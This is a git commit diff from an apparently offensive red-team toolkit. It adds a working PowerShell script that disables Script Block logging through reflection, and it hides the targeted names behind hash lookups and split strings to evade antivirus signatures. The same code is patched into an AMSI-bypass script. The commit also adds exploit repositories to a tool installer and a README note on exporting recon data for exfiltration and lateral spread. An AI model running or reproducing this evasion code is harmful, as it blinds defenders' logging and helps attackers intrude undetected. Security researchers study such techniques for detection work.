Added Script Block logging bypass:

This commit is contained in:
mb 2019-06-19 15:48:24 +02:00
parent db9e879c44
commit afaac0b552
4 changed files with 220 additions and 12 deletions

View File

@ -72,7 +72,7 @@ wget https://gist.githubusercontent.com/mgeeky/8b7b1c8d9fe8be69978d774bddb6e382/
cd $ROOT_DIR/tools
mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,ssl,sourceaudit,shells,wireless}
mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,privesc,ssl,sourceaudit,shells,wireless}
git_clone https://github.com/mgeeky/Penetration-Testing-Tools
@ -203,6 +203,10 @@ git_clone https://github.com/wireghoul/graudit.git
git_clone https://github.com/netbiosX/Checklists.git
popd
pushd privesc
git_clone https://github.com/AusJock/Privilege-Escalation.git
popd
pushd recon
git_clone https://github.com/FortyNorthSecurity/EyeWitness.git
git_clone https://github.com/OWASP/Amass.git
@ -233,6 +237,11 @@ git_clone https://github.com/dxa4481/truffleHog.git
popd
pushd redteam
git_clone https://github.com/jaredhaight/PSAttack.git
cd PSAttack
wget https://github.com/jaredhaight/PSAttack/releases/download/v1.99.1/PSAttack-1.99.1.zip
unzip -d . PSAttack-1.99.1.zip
cd ..
git_clone https://github.com/danielbohannon/Invoke-Obfuscation.git
git_clone https://github.com/FuzzySecurity/PowerShell-Suite.git
git_clone https://github.com/rvrsh3ll/Misc-Powershell-Scripts.git
@ -410,9 +419,11 @@ popd
pushd windows
git_clone https://github.com/M4ximuss/Powerless.git
git_clone https://github.com/SecWiki/windows-kernel-exploit.git
git_clone https://github.com/SecWiki/windows-kernel-exploits.git
git_clone https://github.com/smgorelik/Windows-RCE-exploits.git
git_clone https://github.com/abatchy17/WindowsExploits.git
git_clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
git_clone https://github.com/brianwrf/WinSystemHelper.git
git_clone https://github.com/pentestmonkey/windows-privesc-check.git
git_clone https://github.com/rootm0s/WinPwnage.git
cd WinPwnage
@ -424,7 +435,7 @@ popd
pushd wireless
git_clone https://github.com/brav0hax/easy-creds.git
git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; ./kali-setup ; cd ..
git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; yes | ./kali-setup ; cd ..
git_clone https://github.com/derv82/wifite2.git ; cd wifite2 ; python setup.py install ; cd ..
popd

View File

@ -723,20 +723,62 @@ function Disable-Amsi
return $false
}
function BlockLoggingBypass
function Disable-ScriptLogging
{
try
function ScriptLogging-Technique1
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
$foo.SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
return $true
$out = $foo.GetValue($null)
$k0 = ""
foreach ($item in $out){
if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
$k0 = $item
break
}
Catch
}
#$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
Write-Host "[+] Finished applying technique 1"
return $k0
}
function ScriptLogging-Technique2($k0)
{
return $false
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
if(-not $foo -or $foo -eq $null) {
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
}
if($foo) {
$cache = $foo.GetValue($null)
$k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
if($k1 -and $cache[$k1]) {
$k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
$k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
if($k2 -and $cache[$k1][$k2]) {
$cache[$k1][$k2] = 0
}
if($k3 -and $cache[$k1][$k3]) {
$cache[$k1][$k3] = 0
}
}
$vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$vl.Add('Enabl'+'e'+$k0, 0)
$k01 = $k0 -replace 'kL', 'kInvocationL'
$vl.Add('Ena'+'ble'+$k01, 0)
$cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
}
Write-Host "[+] Finished applying technique 2"
}
$out = ScriptLogging-Technique1
ScriptLogging-Technique2 $out
return $true
}
function Check-IsAdmin {
@ -760,11 +802,11 @@ function Disable-Amsi
}
if ($DontDisableBlockLogging -eq $false) {
if (BlockLoggingBypass) {
if (Disable-ScriptLogging) {
Write-Host "[+] Disabled Script Block logging."
}
else {
Write-Host "[-] Could not disblae Script Block logging."
Write-Host "[-] Could not disable Script Block logging."
}
}

View File

@ -0,0 +1,151 @@
#requires -version 5
<#
.SYNOPSIS
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in
an approach to avoid signatured or otherwise considered harmful keywords.
Notice: These techniques only disable Script Block logging within current process context. Tricks implemented
are not system-wide and not permament.
Using a hash-lookup approach when determining prohibited symbol names, we are able
to avoid relying on blacklisted values and having them hardcoded within the script.
This implementation iterates over all of the assemblies, their exposed types, methods and
fields in order to find those that are required but by their computed hash-value rather than
direct name. Since hash-value computation algorithm was open-sources and is simple to
manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
A simplest approach to alter return values coming out of Get-Hash would be to change the
initial value of $val variable.
The script comes up with several techniques implemented. Triggers them one by one. Should one
return successfully, the script is going to finish it's execution.
The approaches implemented in this script heavily rely on the previous work of:
- Ryan Cobb: https://cobbr.io/ScripXXXtBlock-Logging-BypXXXass.html
- Ryan Cobb: https://cobbr.io/ScriptXXXBlock-Warning-Event-Logging-BypXXXass.html
.EXAMPLES
PS> Disable-ScriptLogging
#>
function Disable-ScriptLogging
{
function bitshift
{
param(
[Parameter(Mandatory,Position=0)]
[long]$x,
[Parameter(ParameterSetName='Left')]
[ValidateRange(0,[int]::MaxValue)]
[int]$Left,
[Parameter(ParameterSetName='Right')]
[ValidateRange(0,[int]::MaxValue)]
[int]$Right
)
$shift = if($PSCmdlet.ParameterSetName -eq 'Left')
{
$Left
}
else
{
-$Right
}
$ret = [math]::Floor($x * [math]::Pow(2,$shift))
return [System.Convert]::TOUInt32($ret -band ([uint32]::MaxValue))
}
function Get-Hash
{
param(
[Parameter(Mandatory = $true)]
[AllowEmptyString()]
[string]$name
)
if ($name.Length -eq 0)
{
return 0
}
$name = $name.ToLower();
$val = 5381
for($i = 0; $i -lt $name.Length; $i++)
{
$n = bitshift $val -left 5
$val = ($n + $val) + [byte][char]$name[$i]
}
return $val
}
function ScriptLogging-Technique1
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
$out = $foo.GetValue($null)
$k0 = ""
foreach ($item in $out){
if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
$k0 = $item
break
}
}
#$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
Write-Host "[+] Finished applying technique 1"
return $k0
}
function ScriptLogging-Technique2($k0)
{
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll
$mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
if(-not $foo -or $foo -eq $null) {
$foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
}
if($foo) {
$cache = $foo.GetValue($null)
$k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
if($k1 -and $cache[$k1]) {
$k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
$k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
if($k2 -and $cache[$k1][$k2]) {
$cache[$k1][$k2] = 0
}
if($k3 -and $cache[$k1][$k3]) {
$cache[$k1][$k3] = 0
}
}
$vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$vl.Add('Enabl'+'e'+$k0, 0)
$k01 = $k0 -replace 'kL', 'kInvocationL'
$vl.Add('Ena'+'ble'+$k01, 0)
$cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
}
Write-Host "[+] Finished applying technique 2"
}
$out = ScriptLogging-Technique1
ScriptLogging-Technique2 $out
}

View File

@ -39,6 +39,10 @@ PS > "amsiInitFailed"
amsiInitFailed
```
- **`Disable-ScriptLogging.ps1`** - Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.
*Warning:* This scriptlet should be launched first, before `Disable-Amsi.ps1` for better OpSec experience.
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.